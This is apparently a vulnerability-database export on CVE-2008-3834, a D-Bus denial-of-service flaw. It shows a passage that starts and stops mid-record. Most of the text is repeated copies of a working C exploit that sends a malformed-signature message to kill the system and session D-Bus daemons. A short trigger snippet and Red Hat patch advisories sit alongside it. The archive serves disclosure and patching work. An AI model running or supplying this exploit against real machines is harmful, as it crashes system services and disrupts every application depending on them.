\n* \n*/ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <stdint.h> \n#include <string.h> \n \n#include <dbus/dbus.h> \n \n#define DEST \"org.freedesktop.ExampleService\" \n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\" \n#define PATH \"/org/freedesktop/sample/object/name\" \n#define SIGNAL \"ExampleMethod\" \n \nint \nmain(int argc, char *argv[]) \n{ \nchar sig[8]; \nuint32_t val = 0xdeadbeef; \nDBusMessage *message; \nDBusConnection *system, *session; \nDBusMessageIter iter1, iter2, iter3, iter4; \n \nprintf(\"[+] creating malicious dbus message...\\n\"); \n \nmessage = dbus_message_new_signal(PATH, NAME, SIGNAL); \nif (!message) { \nprintf(\"[-] error: could not create dbus message\\n\"); \nreturn 1; \n} \nif (!dbus_message_set_destination(message, DEST)) { \nprintf(\"[-] error: could not create set dbus destination\\n\"); \nreturn 1; \n} \n \nsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR; \nsig[1] = DBUS_STRUCT_BEGIN_CHAR; \nsig[2] = DBUS_TYPE_INT32; \nsig[3] = DBUS_TYPE_INT32; \nsig[4] = DBUS_STRUCT_END_CHAR; \nsig[5] = DBUS_TYPE_INT32; \nsig[6] = DBUS_DICT_ENTRY_END_CHAR; \nsig[7] = '\\0'; \n \ndbus_message_iter_init_append(message, &iter1); \ndbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2); \ndbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3); \ndbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4); \ndbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val); \ndbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val); \ndbus_message_iter_close_container(&iter3, &iter4); \ndbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val); \ndbus_message_iter_close_container(&iter2, &iter3); \ndbus_message_iter_close_container(&iter1, &iter2); \n \nprintf(\"[+] connecting to dbus system daemon...\\n\"); \n \nsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL); \n \nif (system) { \nprintf(\"[+] killing dbus system daemon...\\n\"); \n \ndbus_connection_send(system, message, NULL); 
\ndbus_connection_flush(system); \ndbus_connection_unref(system); \n} else { \nprintf(\"[-] error: could not connect to dbus system daemon\\n\"); \n} \n \nprintf(\"[+] connecting to dbus session daemon...\\n\"); \n \nsession = dbus_bus_get(DBUS_BUS_SESSION, NULL); \n \nif (session) { \nprintf(\"[+] killing dbus session daemon...\\n\"); \n \ndbus_connection_send(session, message, NULL); \ndbus_connection_flush(session); \ndbus_connection_unref(session); \n} else { \nprintf(\"[-] error: could not connect to dbus session daemon\\n\"); \n} \n \ndbus_message_unref(message); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/74119/dbus-dos.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nD-Bus Daemon 1.2.4 - libdbus Denial of Service", "edition": 1, "published": "2009-01-19T00:00:00", "title": "D-Bus Daemon 1.2.4 - libdbus Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "id": "EXPLOITPACK:03EDEADC4429D708F596466B2E2F298F", "href": "", "sourceData": "/*\n * cve-2008-3834.c\n *\n * D-Bus Daemon Denial of Service < 1.2.4\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Usage:\n *\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\n * $ ./cve-2008-3834\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\n *\n * The dbus_signature_validate function in the D-bus library (libdbus) \n * before 1.2.4 allows remote attackers to cause a denial of service \n * (application abort) via a message containing a malformed signature,\n * which triggers a failed assertion error. 
\n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\n#include <dbus/dbus.h>\n\n#define DEST \"org.freedesktop.ExampleService\"\n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\"\n#define PATH \"/org/freedesktop/sample/object/name\"\n#define SIGNAL \"ExampleMethod\"\n\nint\nmain(int argc, char *argv[])\n{\n\tchar sig[8];\n\tuint32_t val = 0xdeadbeef;\n\tDBusMessage *message;\n\tDBusConnection *system, *session;\n\tDBusMessageIter iter1, iter2, iter3, iter4;\n\n\tprintf(\"[+] creating malicious dbus message...\\n\");\n\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\n\tif (!message) {\n\t\tprintf(\"[-] error: could not create dbus message\\n\");\n\t\treturn 1;\n\t}\n\tif (!dbus_message_set_destination(message, DEST)) {\n\t\tprintf(\"[-] error: could not create set dbus destination\\n\");\n\t\treturn 1;\n\t}\n\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\n\tsig[2] = DBUS_TYPE_INT32;\n\tsig[3] = DBUS_TYPE_INT32;\n\tsig[4] = DBUS_STRUCT_END_CHAR;\n\tsig[5] = DBUS_TYPE_INT32;\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\n\tsig[7] = '\\0';\n\n\tdbus_message_iter_init_append(message, &iter1);\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter3, &iter4);\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter2, &iter3);\n\tdbus_message_iter_close_container(&iter1, &iter2);\n\n\tprintf(\"[+] connecting to dbus system daemon...\\n\");\n\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\n\n\tif (system) {\n\t\tprintf(\"[+] killing dbus system 
daemon...\\n\");\n\n\t\tdbus_connection_send(system, message, NULL);\n\t\tdbus_connection_flush(system);\n\t\tdbus_connection_unref(system);\n\t} else {\n\t\tprintf(\"[-] error: could not connect to dbus system daemon\\n\");\n\t}\n\n\tprintf(\"[+] connecting to dbus session daemon...\\n\");\n\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\n\n\tif (session) {\n\t\tprintf(\"[+] killing dbus session daemon...\\n\");\n\n\t\tdbus_connection_send(session, message, NULL);\n\t\tdbus_connection_flush(session);\n\t\tdbus_connection_unref(session);\n\t} else {\n\t\tprintf(\"[-] error: could not connect to dbus session daemon\\n\");\n\t}\n\n\tdbus_message_unref(message);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-01-19]", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "D-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nA denial-of-service flaw was discovered in the system for sending messages\nbetween applications. A local user could send a message with a malformed\nsignature to the bus causing the bus (and, consequently, any process using\nlibdbus to receive messages) to abort. (CVE-2008-3834)\n\nAll users are advised to upgrade to these updated dbus packages, which\ncontain backported patch which resolve this issue. 
For the update to take\neffect, all running instances of dbus-daemon and all running applications\nusing the libdbus library must be restarted, or the system rebooted.", "modified": "2017-09-08T12:06:32", "published": "2009-01-07T05:00:00", "id": "RHSA-2009:0008", "href": "https://access.redhat.com/errata/RHSA-2009:0008", "type": "redhat", "title": "(RHSA-2009:0008) Moderate: dbus security update", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "D-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\nnot correctly fix the denial of service flaw in the system for sending\nmessages between applications. A local user could use this flaw to send a\nmessage with a malformed signature to the bus, causing the bus (and,\nconsequently, any process using libdbus to receive messages) to abort.\n(CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying it\nin production environments.\n\nAll users are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
For the update to take effect, all\nrunning instances of dbus-daemon and all running applications using the\nlibdbus library must be restarted, or the system rebooted.", "modified": "2017-09-08T11:49:17", "published": "2010-01-07T05:00:00", "id": "RHSA-2010:0018", "href": "https://access.redhat.com/errata/RHSA-2010:0018", "type": "redhat", "title": "(RHSA-2010:0018) Moderate: dbus security update", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-11T13:30:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189", "CVE-2009-3767", "CVE-2010-0307", "CVE-2010-0410", "CVE-2010-0426", "CVE-2010-0427", "CVE-2010-0430", "CVE-2010-0730", "CVE-2010-0741", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-1163", "CVE-2010-2223"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way QEMU-KVM handled erroneous data provided by the\nLinux virtio-net driver, used by guest operating systems. Due to a\ndeficiency in the TSO (TCP segment offloading) implementation, a guest's\nvirtio-net driver would transmit improper data to a certain QEMU-KVM\nprocess on the host, causing the guest to crash. A remote attacker could\nuse this flaw to send specially-crafted data to a target guest system,\ncausing that guest to crash. (CVE-2010-0741)\n\nA flaw was found in the way the Virtual Desktop Server Manager (VDSM)\nhandled the removal of a virtual machine's (VM) data back end (such as an\nimage or a volume). 
When removing an image or a volume, it was not securely\ndeleted from its corresponding data domain as expected. A guest user in a\nnew, raw VM, created in a data domain that has had VMs deleted from it,\ncould use this flaw to read limited data from those deleted VMs,\npotentially disclosing sensitive information. (CVE-2010-2223)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for Red Hat\nEnterprise Virtualization Hypervisor. These fixes are for dbus issue\nCVE-2009-1189; kernel issues CVE-2010-0307, CVE-2010-0410, CVE-2010-0730,\nCVE-2010-1085, and CVE-2010-1086; openldap issue CVE-2009-3767; and sudo\nissues CVE-2010-0426, CVE-2010-0427, and CVE-2010-1163.\n\nThis update also fixes several bugs and adds several enhancements.\nDocumentation for these bug fixes and enhancements is available from\nhttp://www.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization/2.2/html/Servers-5.5-2.2_Hypervisor_Security_Update\n\nAs Red Hat Enterprise Virtualization Hypervisor is based on KVM, the bug\nfixes and enhancements from the KVM updates RHSA-2010:0271 and\nRHBA-2010:0419 have been included in this update. 
Also included are the bug\nfixes and enhancements from the Virtual Desktop Server Manager (VDSM)\nupdate RHSA-2010:0473, and fence-agents update RHBA-2010:0477.\n\nKVM: https://rhn.redhat.com/errata/RHSA-2010-0271.html and\nhttps://rhn.redhat.com/errata/RHBA-2010-0419.html\nVDSM: https://rhn.redhat.com/errata/RHSA-2010-0473.html\nfence-agents: https://rhn.redhat.com/errata/RHBA-2010-0477.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues and adds these\nenhancements.\n", "modified": "2019-03-22T23:44:52", "published": "2010-06-22T04:00:00", "id": "RHSA-2010:0476", "href": "https://access.redhat.com/errata/RHSA-2010:0476", "type": "redhat", "title": "(RHSA-2010:0476) Important: rhev-hypervisor security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:01", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6304", "CVE-2007-4567", "CVE-2009-1189", "CVE-2009-2409", "CVE-2009-2730", "CVE-2009-2910", "CVE-2009-2957", "CVE-2009-2958", "CVE-2009-3080", "CVE-2009-3556", "CVE-2009-3563", "CVE-2009-3736", "CVE-2009-3889", "CVE-2009-3939", "CVE-2009-4020", "CVE-2009-4021", "CVE-2009-4138", "CVE-2009-4141", "CVE-2009-4212", "CVE-2009-4272", "CVE-2009-4355", "CVE-2009-4536", "CVE-2009-4537", "CVE-2009-4538", "CVE-2010-0001", "CVE-2010-0097", "CVE-2010-0298", "CVE-2010-0306", "CVE-2010-0309"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\n(RHEV) Hypervisor ISO disk image. The RHEV Hypervisor is a dedicated\nKernel-based Virtual Machine (KVM) hypervisor. 
It includes everything\nnecessary to run and manage virtual machines: A subset of the Red Hat\nEnterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: RHEV Hypervisor is only available for the Intel 64 and AMD64\narchitectures with virtualization extensions.\n\nA flaw was found in the IPv6 Extension Header (EH) handling\nimplementation in the Linux kernel. The skb->dst data structure was not\nproperly validated in the ipv6_hop_jumbo() function. This could possibly\nlead to a remote denial of service. (CVE-2007-4567)\n\nThe Parallels Virtuozzo Containers team reported two flaws in the routing\nimplementation. If an attacker was able to cause a large enough number of\ncollisions in the routing hash table (via specially-crafted packets) for\nthe emergency route flush to trigger, a deadlock could occur. Secondly, if\nthe kernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272)\n\nA flaw was found in each of the following Intel PRO/1000 Linux drivers in\nthe Linux kernel: e1000 and e1000e. A remote attacker using packets larger\nthan the MTU could bypass the existing fragment check, resulting in\npartial, invalid frames being passed to the network stack. These flaws\ncould also possibly be used to trigger a remote denial of service.\n(CVE-2009-4536, CVE-2009-4538)\n\nA flaw was found in the Realtek r8169 Ethernet driver in the Linux kernel.\nReceiving overly-long frames with a certain revision of the network cards\nsupported by this driver could possibly result in a remote denial of\nservice. (CVE-2009-4537)\n\nThe x86 emulator implementation was missing a check for the Current\nPrivilege Level (CPL) and I/O Privilege Level (IOPL). A user in a guest\ncould leverage these flaws to cause a denial of service (guest crash) or\npossibly escalate their privileges within that guest. 
(CVE-2010-0298,\nCVE-2010-0306)\n\nA flaw was found in the Programmable Interval Timer (PIT) emulation. Access\nto the internal data structure pit_state, which represents the data state\nof the emulated PIT, was not properly validated in the pit_ioport_read()\nfunction. A privileged guest user could use this flaw to crash the host.\n(CVE-2010-0309)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for RHEV\nHypervisor. These fixes are for kernel issues CVE-2006-6304, CVE-2009-2910,\nCVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\nCVE-2009-4021, CVE-2009-4138, and CVE-2009-4141; ntp issue CVE-2009-3563;\ndbus issue CVE-2009-1189; dnsmasq issues CVE-2009-2957 and CVE-2009-2958;\ngnutls issue CVE-2009-2730; krb5 issue CVE-2009-4212; bind issue \nCVE-2010-0097; gzip issue CVE-2010-0001; openssl issues CVE-2009-2409 and \nCVE-2009-4355; and gcc issue CVE-2009-3736.\n\nThis update also fixes the following bugs:\n\n* on systems with a large number of disk devices, USB storage devices may\nget enumerated after \"/dev/sdz\", for example, \"/dev/sdcd\". This was not\nhandled by the udev rules, resulting in a missing \"/dev/live\" symbolic\nlink, causing installations from USB media to fail. With this update, udev\nrules correctly handle USB storage devices on systems with a large number\nof disk devices, which resolves this issue. 
(BZ#555083)\n\nAs RHEV Hypervisor is based on KVM, the bug fixes from the KVM update\nRHSA-2010:0088 have been included in this update:\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0088.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.", "modified": "2019-03-22T23:44:58", "published": "2010-02-09T05:00:00", "id": "RHSA-2010:0095", "href": "https://access.redhat.com/errata/RHSA-2010:0095", "type": "redhat", "title": "(RHSA-2010:0095) Important: rhev-hypervisor security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:24:13", "description": "BUGTRAQ ID: 31602\r\nCVE ID\uff1aCVE-2008-3834\r\nCNCVE ID\uff1aCNCVE-20083834\r\n\r\nD-BUS\u662f\u4e00\u6b3e\u8bbe\u8ba1\u76ee\u6807\u4e3a\u5e94\u7528\u7a0b\u5e8f\u95f4\u901a\u4fe1\u7684\u6d88\u606f\u603b\u7ebf\u7cfb\u7edf\u3002\r\nD-BUS\u4e0d\u6b63\u786e\u5904\u7406\u5305\u542b\u5728\u6d88\u606f\u4e2d\u7684\u7578\u5f62\u7b7e\u540d\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u4f7f\u7528\u6b64\u5e93\u7684\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u5f53\u8981\u6c42\u9a8c\u8bc1\u7c7b\u578b\u7b7e\u540d"a{(ii)i}"\u65f6\u53ef\u5bfc\u81f4\u51fd\u6570dbus_signature_validate()\u51fa\u73b0\u9519\u8bef\u3002\r\n\u6839\u636e\u6587\u6863\uff0cdbus_signature_validate()\u53ef\u4ee5\u7528\u4e8e\u68c0\u67e5\u7c7b\u578b\u7b7e\u540d\u7684\u5408\u6cd5\u6027\uff0c\u56e0\u6b64\u6b63\u786e\u7684\u5fc5\u987b\u662f\u5bf9\u4e0a\u9762\u63d0\u5230\u7684\u7c7b\u578b\u7b7e\u540d\u786e\u5b9a\u4e3a\u975e\u6cd5\u3002\n\nD-BUS Inter-Process Communication System 1.2.1\n \u53ef\u53c2\u8003\u5982\u4e0b\u94fe\u63a5\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=https://bugs.freedesktop.org/show_bug.cgi?id=17803 target=_blank>https://bugs.freedesktop.org/show_bug.cgi?id=17803</a>", "published": "2008-10-08T00:00:00", 
"type": "seebug", "title": "D-Bus 'dbus_signature_validate()'\u7c7b\u578b\u7b7e\u540d\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4172", "id": "SSV:4172", "sourceData": "\n #include <dbus/dbus.h>\r\nint main ()\r\n{\r\n return !dbus_signature_validate("a{(ii)i}", NULL);\r\n}\r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4172", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:06:30", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66216", "id": "SSV:66216", "sourceData": "\n /*\r\n * cve-2008-3834.c\r\n *\r\n * D-Bus Daemon Denial of Service < 1.2.4\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Usage:\r\n *\r\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\r\n * $ ./cve-2008-3834\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\r\n *\r\n * The dbus_signature_validate function in the D-bus library (libdbus) \r\n * before 1.2.4 allows remote attackers to cause a denial of service \r\n * (application abort) via a message containing a malformed signature,\r\n * which triggers a failed assertion error. 
\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n\r\n#include <dbus/dbus.h>\r\n\r\n#define DEST "org.freedesktop.ExampleService"\r\n#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"\r\n#define PATH "/org/freedesktop/sample/object/name"\r\n#define SIGNAL "ExampleMethod"\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n\tchar sig[8];\r\n\tuint32_t val = 0xdeadbeef;\r\n\tDBusMessage *message;\r\n\tDBusConnection *system, *session;\r\n\tDBusMessageIter iter1, iter2, iter3, iter4;\r\n\r\n\tprintf("[+] creating malicious dbus message...\\n");\r\n\r\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\r\n\tif (!message) {\r\n\t\tprintf("[-] error: could not create dbus message\\n");\r\n\t\treturn 1;\r\n\t}\r\n\tif (!dbus_message_set_destination(message, DEST)) {\r\n\t\tprintf("[-] error: could not create set dbus destination\\n");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\r\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\r\n\tsig[2] = DBUS_TYPE_INT32;\r\n\tsig[3] = DBUS_TYPE_INT32;\r\n\tsig[4] = DBUS_STRUCT_END_CHAR;\r\n\tsig[5] = DBUS_TYPE_INT32;\r\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\r\n\tsig[7] = '\\0';\r\n\r\n\tdbus_message_iter_init_append(message, &iter1);\r\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\r\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\r\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter3, &iter4);\r\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter2, &iter3);\r\n\tdbus_message_iter_close_container(&iter1, &iter2);\r\n\r\n\tprintf("[+] connecting to dbus system daemon...\\n");\r\n\r\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, 
NULL);\r\n\r\n\tif (system) {\r\n\t\tprintf("[+] killing dbus system daemon...\\n");\r\n\r\n\t\tdbus_connection_send(system, message, NULL);\r\n\t\tdbus_connection_flush(system);\r\n\t\tdbus_connection_unref(system);\r\n\t} else {\r\n\t\tprintf("[-] error: could not connect to dbus system daemon\\n");\r\n\t}\r\n\r\n\tprintf("[+] connecting to dbus session daemon...\\n");\r\n\r\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\r\n\r\n\tif (session) {\r\n\t\tprintf("[+] killing dbus session daemon...\\n");\r\n\r\n\t\tdbus_connection_send(session, message, NULL);\r\n\t\tdbus_connection_flush(session);\r\n\t\tdbus_connection_unref(session);\r\n\t} else {\r\n\t\tprintf("[-] error: could not connect to dbus session daemon\\n");\r\n\t}\r\n\r\n\tdbus_message_unref(message);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-01-19]\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66216"}, {"lastseen": "2017-11-19T22:35:47", "description": "BUGTRAQ ID: 31602\r\nCVE(CAN) ID: CVE-2008-3834\r\n\r\nD-BUS\u662f\u4e00\u4e2a\u8bbe\u8ba1\u76ee\u6807\u4e3a\u5e94\u7528\u7a0b\u5e8f\u95f4\u901a\u4fe1\u7684\u6d88\u606f\u603b\u7ebf\u7cfb\u7edf\u3002\r\n\r\nD-BUS\u7684_dbus_validate_signature_with_reason()\u51fd\u6570\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u7c7b\u578b\u4ee3\u7801\uff1a\r\n\r\n if (last == DBUS_DICT_ENTRY_BEGIN_CHAR &&\r\n !dbus_type_is_basic (*p))\r\n {\r\n result = DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE;\r\n goto out;\r\n }\r\n\r\n\u5982\u679c\u4f7f\u7528D-Bus\u7684\u5e94\u7528\u53d7\u9a97\u9a8c\u8bc1\u4e86\u7279\u5236\u7684\u7b7e\u540d\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u4f1a\u7ec8\u6b62\u3002\r\n\n\nD-Bus 1.2.1\n D-Bus\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a 
href=http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9 target=_blank>http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9</a>", "published": "2008-10-10T00:00:00", "title": "D-Bus dbus_signature_validate()\u7c7b\u578b\u7b7e\u540d\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4192", "id": "SSV:4192", "sourceData": "\n #include <dbus/dbus.h>\r\n\r\nint main ()\r\n{\r\n return !dbus_signature_validate("a{(ii)i}", NULL);\r\n}\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4192"}, {"lastseen": "2017-11-19T19:00:58", "description": "No description provided by source.", "published": "2009-01-19T00:00:00", "type": "seebug", "title": "D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17745", "id": "SSV:17745", "sourceData": "\n /*\n * cve-2008-3834.c\n *\n * D-Bus Daemon Denial of Service < 1.2.4\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Usage:\n *\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\n * $ ./cve-2008-3834\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\n *\n * The dbus_signature_validate function in the D-bus library (libdbus) \n * before 1.2.4 allows remote attackers to cause a denial of service \n * (application abort) via a message containing a malformed signature,\n * which triggers a failed assertion error. 
\n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\n#include <dbus/dbus.h>\n\n#define DEST "org.freedesktop.ExampleService"\n#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"\n#define PATH "/org/freedesktop/sample/object/name"\n#define SIGNAL "ExampleMethod"\n\nint\nmain(int argc, char *argv[])\n{\n\tchar sig[8];\n\tuint32_t val = 0xdeadbeef;\n\tDBusMessage *message;\n\tDBusConnection *system, *session;\n\tDBusMessageIter iter1, iter2, iter3, iter4;\n\n\tprintf("[+] creating malicious dbus message...\\n");\n\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\n\tif (!message) {\n\t\tprintf("[-] error: could not create dbus message\\n");\n\t\treturn 1;\n\t}\n\tif (!dbus_message_set_destination(message, DEST)) {\n\t\tprintf("[-] error: could not create set dbus destination\\n");\n\t\treturn 1;\n\t}\n\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\n\tsig[2] = DBUS_TYPE_INT32;\n\tsig[3] = DBUS_TYPE_INT32;\n\tsig[4] = DBUS_STRUCT_END_CHAR;\n\tsig[5] = DBUS_TYPE_INT32;\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\n\tsig[7] = '\\0';\n\n\tdbus_message_iter_init_append(message, &iter1);\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter3, &iter4);\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter2, &iter3);\n\tdbus_message_iter_close_container(&iter1, 